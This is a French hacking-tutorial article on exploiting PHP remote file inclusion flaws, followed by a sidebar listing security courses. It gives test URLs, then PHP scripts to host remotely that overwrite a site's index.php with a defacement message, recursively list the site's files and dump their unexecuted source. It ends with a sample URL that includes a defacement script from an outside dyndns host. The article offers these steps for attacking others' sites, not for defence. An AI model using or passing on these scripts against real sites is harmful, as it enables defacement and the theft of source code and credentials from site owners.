Articles
Source : NoFutur, Noway, NoRoute, Jokers, Hacker2020, Phrack, libertad, lotfree, Wikipédia, etc..
Retour à la liste des articles

Faille PHP include

Introduction

Le PHP au contraire de l' HTML est dynamique, on peut changer le contenu de la page.
L' URL http://www.site.com/index.php?page=Mikabou.php indique la redirection vers la page Mikabou.php
Pour exploiter une faille include il faut donc une URL de ce type http://www.lesite.fr/page.php?url=page.php 
Pour voir si la faille est presente on va essayer de rediriger la page vers google tapez donc:
http://www.lesite.fr/page.php?url=http://www.google.fr  ou http://www.site.fr/page.php?var=http://www.google.fr 
Là si Google apparaît dans le site , c'est que le site n'est apparemment pas protégé 

Comment l'exploiter?

Pour pouvoir exploiter et defacer l'index il faut ajouter du code en utilisant la fonction 
fwrite(). Il suffit de faire ce petit script php et de l' héberger sur un compte comme Lycos

<?
$fp=fopen("index.php", w); 
$msg="Message qui apparait comme Defaced by Mikabou "; 
fwrite($fp,$msg); 
fclose($fp); 
?> 
lister le site

<?
function scann($rep){
$dir=opendir($rep);
while($file=readdir($dir)){
if(is_dir("$rep/$file")){
scann("$rep/$file");
}else{
echo "$rep/$file";
}
}
}
scann(".");
?>


lire les fichier (ceci veut dire que vous aurez le code php non interpreter)

<?
$inF = fopen($file, "r");
$j="";
while (!feof($inF)) {
$j=$j.fgets($inF, 4096)."<br>";
}
$j='<font color="#000000">'.$j.'</font>';
echo $j;
fclose($inF);
?>


Maintenant le code finie il suffit de rediriger la page, sur le script qui defacera l' index. Exemple; http://www.lesite.fr/page.php?url=http://baliste.dyndns.org/deface
Livre:

WatchFire


Vidéo:
Cours Sécurité:
  • Définitions Niveau : Débutant (Français)
    tout les mots que vous voulez savoir mais que vous n'osez demander.
  • Histoire Niveau : Débutant (Français)
    un peu d'histoire pour ceux qui aiment
  • Cours Metasploit Niveau : Intermediaire (Français)
    Le Framework Metasploit est un environnement complet pour écrire, tester et utiliser des exploits. Cet environnement fournit une plateforme solide pour les tests d'intrusion, le développement de shellcodes, et la recherche de vulnérabilités. La majorité du Framework est composée de code orienté objet Perl, avec des composants optionnels écrits en C, assembleur, et Python.
  • hackers_guide Niveau : Avancé (Anglais)
    Se placer du point de vue de l'attaquant pour améliorer sa propre sécurité. - Telecharger le rar: hackers_guide.rar
  • Reseaux de neuronnes Niveau : Avancé (Français)
    Les objectifs, l'histoire, les applications. Le modèle d'un neurone, fonction de transfert, architecture de réseau. Les outils mathématiques : algère linéaire, espace vectoriel, produit scalair, norme, orthogonalité, transformation linéaire. Les apprentissages : supervisé, non-supervisé et autres. Le perceptron multicouches, les nuées dynamiques (K-means, fuzzy k-means...). Les réseaux de Kohonen. Reseaux GNG, Architecture ART. ACP et apprentissage hebbien. - Telecharger le zip: RNF
  • Crackage et durcissement de mots de passesNiveau : Débutant (Français)
  • Securiser un forum PhpBBNiveau : intermediaire (Français)
Tutoriaux
Tutoriaux Failles Web
Divers